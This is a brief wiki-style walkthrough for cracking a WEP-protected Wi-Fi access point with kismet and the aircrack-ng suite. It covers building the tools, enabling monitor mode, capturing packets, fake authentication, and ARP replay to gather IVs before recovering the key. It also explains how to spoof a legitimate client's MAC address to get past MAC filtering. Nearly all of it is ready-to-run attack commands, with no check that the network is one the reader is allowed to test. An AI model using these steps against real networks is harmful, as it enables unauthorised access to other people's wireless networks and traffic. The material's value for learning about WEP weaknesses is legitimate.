Cracking A WEP Key
Jump to navigation
Jump to search
- Download aircrack-ng source
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
- Change ~/src/aircrack-ng/common.mak:
CFLAGS ?= -g -W -Wall -Werror -fno-strict-aliasing -O3
- Compile and install:
make && sudo make install
- Use kismet to get the channel (11), ESSid (crackme), and BSSid (00:18:4D:85:65:4F) for the access point to be cracked
These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits
- Become root:
su -
- Put NIC into monitor mode:
airmon-ng start wlan0
- Start capturing packets:
airodump-ng -w dumpfile -c 11 -i mon0
New terminal session:
- Associate with the target AP
/usr/local/sbin/aireplay-ng -1 0 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0
If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.
- Start replaying packets so that we can collect more packets:
/usr/local/sbin/aireplay-ng -3 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0
Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers.
- Ctrl-C the dump process and crack the key:
aircrack-ng dumpfile.ivs